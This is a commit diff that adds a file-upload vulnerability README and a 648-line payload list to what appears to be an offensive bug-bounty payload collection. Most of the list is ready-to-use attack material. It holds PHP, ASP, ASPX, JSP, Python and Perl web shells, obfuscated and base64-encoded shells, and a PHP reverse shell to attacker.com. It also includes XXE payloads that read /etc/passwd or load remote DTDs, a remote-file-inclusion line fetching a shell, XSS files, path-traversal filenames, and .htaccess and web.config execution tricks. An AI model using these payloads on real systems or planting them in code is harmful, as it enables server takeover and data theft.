Add NoSQL, CSV, File Upload vulnerabilities and enhance Command Injection

Co-authored-by: Stalin-143 <161853795+Stalin-143@users.noreply.github.com>

File-Upload/README.md

@@ -0,0 +1,73 @@
+# File Upload Vulnerabilities
+
+## Description
+File upload vulnerabilities occur when a web application allows users to upload files without properly validating the file type, content, or destination. Attackers can exploit these vulnerabilities to upload malicious files, leading to remote code execution (RCE), arbitrary file read/write, cross-site scripting (XSS), and other attacks.
+
+## Common Attack Vectors
+- Profile picture upload
+- Document upload features
+- Resume/CV upload
+- Image galleries
+- File sharing functionality
+- Import/export features
+- Backup/restore functionality
+- Plugin/theme upload (CMS)
+- Attachment features
+
+## Testing Approach
+Test various file upload bypasses:
+- Extension bypasses (double extensions, case variations, null bytes)
+- Content-Type manipulation
+- Magic byte manipulation
+- Polyglot files (valid image + valid code)
+- Archive file manipulation (zip, tar)
+- Path traversal in filenames
+- File overwrite attacks
+- XXE via SVG/XML files
+
+## Risk Impact
+- **Remote Code Execution (RCE)** - Upload and execute web shells
+- **Cross-Site Scripting (XSS)** - Upload HTML/SVG files with JavaScript
+- **Path Traversal** - Overwrite critical files
+- **Denial of Service** - Upload large files, zip bombs
+- **Information Disclosure** - Read sensitive files
+- **Defacement** - Overwrite web pages
+- **Malware Distribution** - Host malicious files
+
+## Common Vulnerable Patterns
+- Blacklist-based file type validation (instead of whitelist)
+- Client-side only validation
+- Inadequate Content-Type checking
+- Missing magic byte validation
+- Predictable upload paths
+- Executable permissions on upload directories
+- Lack of file size limits
+- No antivirus scanning
+
+## File Extensions to Test
+**Web Shells & RCE:**
+- PHP: `.php`, `.php3`, `.php4`, `.php5`, `.php7`, `.phtml`, `.phar`, `.phpt`, `.pgif`, `.pht`
+- ASP: `.asp`, `.aspx`, `.asa`, `.asax`, `.ascx`, `.ashx`, `.asmx`, `.cer`, `.config`
+- JSP: `.jsp`, `.jspx`, `.jsw`, `.jsv`, `.jspf`
+- Perl: `.pl`, `.pm`, `.cgi`, `.lib`
+- Python: `.py`, `.pyc`, `.pyw`
+- Ruby: `.rb`, `.rbw`
+- Other: `.shtml`, `.shtm`, `.phar`, `.inc`
+
+**Script Files:**
+- `.js`, `.vbs`, `.bat`, `.cmd`, `.ps1`, `.sh`
+
+**Server Config:**
+- `.htaccess`, `.htpasswd`, `.web.config`, `.conf`
+
+## Payloads
+See `file-upload-payloads.txt` for comprehensive payloads including:
+- Extension bypass techniques
+- Content-Type bypasses
+- Magic byte manipulation
+- Polyglot file examples
+- Web shell payloads (PHP, ASP, JSP)
+- XSS via file upload
+- Path traversal in filenames
+- XXE via SVG/XML uploads
+- Archive-based attacks

File-Upload/file-upload-payloads.txt

@@ -0,0 +1,648 @@
+# File Upload Vulnerability Payloads (2020-2025 Bug Bounty Tested)
+
+# ============================
+# FILE EXTENSION BYPASSES
+# ============================
+
+# Double Extensions
+shell.php.jpg
+shell.php.png
+shell.php.gif
+shell.php.pdf
+shell.php.txt
+shell.jpg.php
+shell.png.php
+exploit.asp.jpg
+exploit.aspx.png
+backdoor.jsp.gif
+
+# Case Variations
+shell.PHP
+shell.PhP
+shell.pHp
+shell.Php
+shell.PHp
+shell.ASP
+shell.ASPX
+shell.AsP
+shell.JSP
+
+# Null Byte Injection (older systems)
+shell.php%00.jpg
+shell.php%00.png
+shell.php\x00.jpg
+shell.asp%00.gif
+exploit.jsp%00.pdf
+
+# Special Characters
+shell.php.....
+shell.php%20
+shell.php%0a
+shell.php%00
+shell.php%0d%0a
+shell.php::$DATA
+shell.php::$INDEX_ALLOCATION
+
+# Alternate Extensions (PHP)
+shell.php3
+shell.php4
+shell.php5
+shell.php7
+shell.phtml
+shell.phar
+shell.phpt
+shell.pgif
+shell.pht
+shell.inc
+shell.hphp
+shell.ctp
+
+# Alternate Extensions (ASP/ASPX)
+shell.asp
+shell.aspx
+shell.asa
+shell.asax
+shell.ascx
+shell.ashx
+shell.asmx
+shell.cer
+shell.config
+shell.soap
+shell.rem
+
+# Alternate Extensions (JSP)
+shell.jsp
+shell.jspx
+shell.jsw
+shell.jsv
+shell.jspf
+
+# Other Language Extensions
+shell.pl
+shell.pm
+shell.cgi
+shell.py
+shell.pyc
+shell.rb
+shell.rbw
+shell.sh
+shell.bash
+
+# Executable Extensions
+malware.exe
+backdoor.bat
+script.cmd
+payload.ps1
+reverse.sh
+
+# Server Config Files
+.htaccess
+.htpasswd
+web.config
+httpd.conf
+.user.ini
+php.ini
+
+# ============================
+# CONTENT-TYPE BYPASSES
+# ============================
+
+# Common Content-Type Headers to Test:
+
+# Legitimate looking but with malicious content
+Content-Type: image/jpeg
+Content-Type: image/png
+Content-Type: image/gif
+Content-Type: image/bmp
+Content-Type: image/svg+xml
+Content-Type: application/pdf
+Content-Type: application/zip
+Content-Type: text/plain
+Content-Type: text/csv
+Content-Type: application/octet-stream
+Content-Type: video/mp4
+Content-Type: audio/mpeg
+
+# Empty or null
+Content-Type: 
+Content-Type: null
+Content-Type: undefined
+
+# Malformed
+Content-Type: image/jpeg; charset=binary
+Content-Type: multipart/form-data; boundary=something
+
+# ============================
+# MAGIC BYTES (File Signatures)
+# ============================
+
+# PHP Web Shell with JPEG Header
+FF D8 FF E0 (JPEG magic bytes)
+<?php system($_GET['cmd']); ?>
+
+# PHP Web Shell with PNG Header
+89 50 4E 47 0D 0A 1A 0A (PNG magic bytes)
+<?php system($_GET['cmd']); ?>
+
+# PHP Web Shell with GIF Header
+GIF89a
+<?php system($_GET['cmd']); ?>
+
+# PHP Web Shell with PDF Header
+%PDF-1.4
+<?php system($_GET['cmd']); ?>
+
+# PHP Web Shell with ZIP Header
+PK (ZIP magic bytes)
+<?php system($_GET['cmd']); ?>
+
+# ============================
+# POLYGLOT FILES (Valid Image + Valid Code)
+# ============================
+
+# GIF + PHP Polyglot
+GIF89a<?php system($_GET['cmd']); ?>
+
+# JPEG + PHP Polyglot (with comment)
+# Add PHP code in JPEG comment section
+# Use exiftool: exiftool -Comment='<?php system($_GET["cmd"]); ?>' image.jpg
+
+# PNG + PHP Polyglot
+# Use PNG ancillary chunks to hide PHP code
+
+# BMP + PHP Polyglot
+# BMP header followed by PHP code in pixel data
+
+# ============================
+# WEB SHELL PAYLOADS
+# ============================
+
+# === PHP Web Shells ===
+
+# Simple PHP Shell
+<?php system($_GET['cmd']); ?>
+
+# PHP Shell with POST
+<?php system($_POST['cmd']); ?>
+
+# PHP Eval Shell
+<?php eval($_REQUEST['cmd']); ?>
+
+# PHP Passthru Shell
+<?php passthru($_GET['cmd']); ?>
+
+# PHP Exec Shell
+<?php echo exec($_GET['cmd']); ?>
+
+# PHP Shell_exec
+<?php echo shell_exec($_GET['cmd']); ?>
+
+# PHP Backdoor
+<?php
+if(isset($_REQUEST['cmd'])){
+    echo "<pre>";
+    $cmd = ($_REQUEST['cmd']);
+    system($cmd);
+    echo "</pre>";
+    die;
+}
+?>
+
+# PHP File Manager Shell
+<?php
+if(isset($_GET['file'])){
+    echo file_get_contents($_GET['file']);
+}
+if(isset($_FILES['upload'])){
+    move_uploaded_file($_FILES['upload']['tmp_name'], $_FILES['upload']['name']);
+}
+?>
+
+# PHP One-liner Shells
+<?=`$_GET[x]`?>
+<?=system($_GET[x]);?>
+<?=shell_exec($_GET[x]);?>
+<?=passthru($_GET[x]);?>
+<?=exec($_GET[x]);?>
+
+# Obfuscated PHP Shell
+<?php $a=$_GET['a'];$b=$_GET['b'];$a($b);?>
+<?php @eval($_POST['x']);?>
+<?php @assert($_POST['x']);?>
+<?php $f='sys'.'tem';$f($_GET['x']);?>
+
+# PHP Reverse Shell
+<?php
+$sock=fsockopen("attacker.com",4444);
+exec("/bin/sh -i <&3 >&3 2>&3");
+?>
+
+# === ASP/ASPX Web Shells ===
+
+# ASP Shell
+<%
+Set oScript = Server.CreateObject("WSCRIPT.SHELL")
+Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
+Response.Write(oScript.Exec("cmd /c " & Request.QueryString("cmd")).StdOut.ReadAll())
+%>
+
+# ASPX Shell
+<%@ Page Language="C#" %>
+<%@ Import Namespace="System.Diagnostics" %>
+<script runat="server">
+void Page_Load(object sender, EventArgs e){
+    Process p = new Process();
+    p.StartInfo.FileName = "cmd.exe";
+    p.StartInfo.Arguments = "/c " + Request.QueryString["cmd"];
+    p.StartInfo.RedirectStandardOutput = true;
+    p.StartInfo.UseShellExecute = false;
+    p.Start();
+    Response.Write(p.StandardOutput.ReadToEnd());
+}
+</script>
+
+# ASPX One-liner
+<%@ Page Language="Jscript"%><%eval(Request.Item["cmd"],"unsafe");%>
+
+# === JSP Web Shells ===
+
+# JSP Shell
+<%@ page import="java.io.*" %>
+<%
+String cmd = request.getParameter("cmd");
+Process p = Runtime.getRuntime().exec(cmd);
+InputStream in = p.getInputStream();
+int i;
+while((i = in.read()) != -1) {
+    out.print((char)i);
+}
+%>
+
+# JSP One-liner
+<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>
+
+# === Python Web Shell ===
+
+#!/usr/bin/env python
+import os
+import cgi
+form = cgi.FieldStorage()
+cmd = form.getvalue('cmd')
+os.system(cmd)
+
+# === Perl Web Shell ===
+
+#!/usr/bin/perl
+use CGI;
+$q = CGI->new;
+print $q->header;
+print `$q->param('cmd')`;
+
+# ============================
+# XSS VIA FILE UPLOAD
+# ============================
+
+# HTML File Upload
+<html>
+<body>
+<script>alert(document.cookie)</script>
+</body>
+</html>
+
+# SVG File Upload with XSS
+<?xml version="1.0" standalone="no"?>
+<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
+<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
+   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
+   <script type="text/javascript">
+      alert(document.domain);
+   </script>
+</svg>
+
+# SVG with XSS (onload)
+<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)">
+
+# PDF with XSS (if rendered in browser)
+%PDF-1.4
+1 0 obj
+<<
+/Type /Catalog
+/Outlines 2 0 R
+/Pages 3 0 R
+/OpenAction << /S /JavaScript /JS (app.alert('XSS');) >>
+>>
+endobj
+
+# XML with XSS
+<?xml version="1.0"?>
+<!DOCTYPE html [
+<!ENTITY js "alert(document.domain)">
+]>
+<html>
+<body>
+<script>&js;</script>
+</body>
+</html>
+
+# ============================
+# XXE VIA FILE UPLOAD
+# ============================
+
+# SVG with XXE
+<?xml version="1.0" standalone="yes"?>
+<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]>
+<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
+   <text font-size="16" x="0" y="16">&xxe;</text>
+</svg>
+
+# XML with XXE
+<?xml version="1.0"?>
+<!DOCTYPE foo [
+<!ELEMENT foo ANY >
+<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
+<foo>&xxe;</foo>
+
+# XXE - Parameter Entity
+<?xml version="1.0"?>
+<!DOCTYPE foo [
+<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">
+%xxe;
+]>
+<foo>&exfil;</foo>
+
+# XXE - Blind OOB
+<?xml version="1.0" ?>
+<!DOCTYPE r [
+<!ELEMENT r ANY >
+<!ENTITY % sp SYSTEM "http://attacker.com/xxe.dtd">
+%sp;
+%param1;
+]>
+<r>&exfil;</r>
+
+# ============================
+# PATH TRAVERSAL IN FILENAME
+# ============================
+
+# Directory Traversal
+../../../etc/passwd
+..\..\..\..\windows\system32\config\sam
+....//....//....//etc/passwd
+
+# Overwrite Important Files
+../../../var/www/html/index.php
+../../../.ssh/authorized_keys
+../../config.php
+../../../.htaccess
+../../wp-config.php
+
+# Filename with Path Traversal
+../../../../tmp/shell.php
+..%2f..%2f..%2fetc%2fpasswd
+..%252f..%252f..%252fetc%252fpasswd
+
+# ============================
+# HTACCESS FILE UPLOAD
+# ============================
+
+# .htaccess to Execute PHP
+AddType application/x-httpd-php .jpg
+AddType application/x-httpd-php .png
+AddType application/x-httpd-php .gif
+
+# .htaccess to Execute All Files as PHP
+AddType application/x-httpd-php .
+SetHandler application/x-httpd-php
+
+# .htaccess to Bypass Upload Restrictions
+<FilesMatch "\.ph(p|tml)">
+SetHandler application/x-httpd-php
+</FilesMatch>
+
+# ============================
+# WEB.CONFIG FILE UPLOAD (IIS)
+# ============================
+
+<?xml version="1.0" encoding="UTF-8"?>
+<configuration>
+   <system.webServer>
+      <handlers>
+         <add name="PHP_via_FastCGI" 
+              path="*.jpg" 
+              verb="*" 
+              modules="FastCgiModule" 
+              scriptProcessor="C:\PHP\php-cgi.exe" 
+              resourceType="Unspecified" />
+      </handlers>
+   </system.webServer>
+</configuration>
+
+# ============================
+# ARCHIVE-BASED ATTACKS
+# ============================
+
+# ZIP Slip - Malicious Archive
+# Create zip file with: ../../../../var/www/html/shell.php
+
+# ZIP with Symlink
+# ln -s /etc/passwd passwd.txt
+# zip --symlinks payload.zip passwd.txt
+
+# TAR with Path Traversal
+# tar -cf payload.tar ../../../../var/www/html/shell.php
+
+# Zip Bomb (DoS)
+# Create highly compressed file that expands to huge size
+
+# ============================
+# IMAGE METADATA INJECTION
+# ============================
+
+# EXIF Data with XSS (if displayed)
+exiftool -Comment='<script>alert(1)</script>' image.jpg
+
+# EXIF Data with PHP Code
+exiftool -Comment='<?php system($_GET["cmd"]); ?>' image.jpg
+
+# IPTC Data Injection
+exiftool -IPTC:Caption-Abstract='<?php eval($_POST["x"]); ?>' image.jpg
+
+# ============================
+# SERVER-SPECIFIC BYPASSES
+# ============================
+
+# Apache
+shell.php.jpg (with .htaccess: AddType application/x-httpd-php .jpg)
+.htaccess file to execute images as PHP
+
+# IIS
+shell.asp;.jpg
+shell.asp:.jpg
+web.config to execute images as ASP
+
+# Nginx
+shell.php%00.jpg (older versions)
+Upload to misconfigured alias/location
+
+# Tomcat
+shell.jsp%00.jpg
+shell.jspx
+
+# ============================
+# RACE CONDITION FILE UPLOAD
+# ============================
+
+# Upload file quickly and access before validation/deletion
+# Technique: Concurrent upload and access requests
+
+# ============================
+# FILE UPLOAD WITH SIZE BYPASS
+# ============================
+
+# Small malicious file
+<?=`$_GET[0]`?>
+
+# Compressed PHP shell
+<?=`{$_GET[0]}`;
+
+# ============================
+# MIME TYPE CONFUSION
+# ============================
+
+# Upload with different MIME types
+Content-Type: application/x-php
+Content-Type: application/x-httpd-php
+Content-Type: application/php
+Content-Type: text/php
+Content-Type: text/x-php
+
+# ============================
+# POLYGLOT FILES FOR MULTIPLE FORMATS
+# ============================
+
+# JPEG + JAR Polyglot (for Java apps)
+# Valid JPEG and valid JAR simultaneously
+
+# PDF + HTML Polyglot
+%PDF-1.4
+<html><script>alert(1)</script></html>
+
+# GIF + JavaScript
+GIF89a/*<?php
+<script>alert(1)</script>
+<?php */;
+
+# ============================
+# MODERN BYPASS TECHNIQUES (2023-2025)
+# ============================
+
+# Unicode Normalization
+shell.php%E2%80%AE.jpg (Right-to-Left Override)
+shell‮gpj.php (RLO character)
+
+# Homoglyph Attacks
+shell.рhр (Cyrillic р instead of Latin p)
+shell.рhр
+
+# UTF-8 BOM
+<?php system($_GET['cmd']); ?>
+
+# Long Filename DoS
+# Create extremely long filename to bypass validation
+
+# Multiple Content-Disposition
+Content-Disposition: form-data; name="file"; filename="safe.jpg"
+Content-Disposition: form-data; name="file"; filename="shell.php"
+
+# Null Session (Windows)
+\\127.0.0.1\c$\inetpub\wwwroot\shell.php
+
+# Case Sensitivity Issues
+ShElL.PhP
+SHELL.php
+Shell.PHP
+
+# ============================
+# FRAMEWORK-SPECIFIC BYPASSES
+# ============================
+
+# WordPress
+wp-content/uploads/shell.php
+wp-content/themes/shell.php
+wp-content/plugins/shell.php
+
+# Drupal
+sites/default/files/shell.php
+
+# Joomla
+media/shell.php
+images/shell.php
+
+# Laravel
+storage/app/shell.php
+public/uploads/shell.php
+
+# Django
+media/uploads/shell.py
+
+# ============================
+# REMOTE FILE INCLUSION VIA UPLOAD
+# ============================
+
+# Upload file containing:
+<?php include($_GET['file']); ?>
+<?php require($_GET['file']); ?>
+<?php include_once($_GET['file']); ?>
+
+# Then access with:
+?file=http://attacker.com/shell.txt
+?file=php://input (with POST data containing PHP code)
+?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+
+
+# ============================
+# FILE UPLOAD WITH SSRF
+# ============================
+
+# Upload file that triggers SSRF
+<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
+<image xlink:href="http://internal-server/admin"/>
+</svg>
+
+# ============================
+# DESERIALIZATION VIA FILE UPLOAD
+# ============================
+
+# PHP Phar Deserialization
+# Upload malicious .phar file
+# Trigger via: file_get_contents('phar://uploads/payload.phar/test.txt')
+
+# Java Deserialization
+# Upload serialized Java object
+# Trigger if application deserializes uploaded files
+
+# ============================
+# EICAR TEST FILE (AV Bypass Testing)
+# ============================
+
+X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
+
+# ============================
+# BINARY PAYLOAD ENCODINGS
+# ============================
+
+# Base64 Encoded Shell
+<?php eval(base64_decode("c3lzdGVtKCRfR0VUWydjbWQnXSk7")); ?>
+
+# Hex Encoded
+<?php eval(hex2bin("73797374656d28245f4745545b27636d64275d293b")); ?>
+
+# ROT13
+<?php eval(str_rot13("flfgrz($_TRG['pzq']);")); ?>
+
+# ============================
+# ALTERNATIVE DATA STREAMS (Windows/NTFS)
+# ============================
+
+shell.php::$DATA
+shell.asp::$DATA
+payload.txt:hidden.php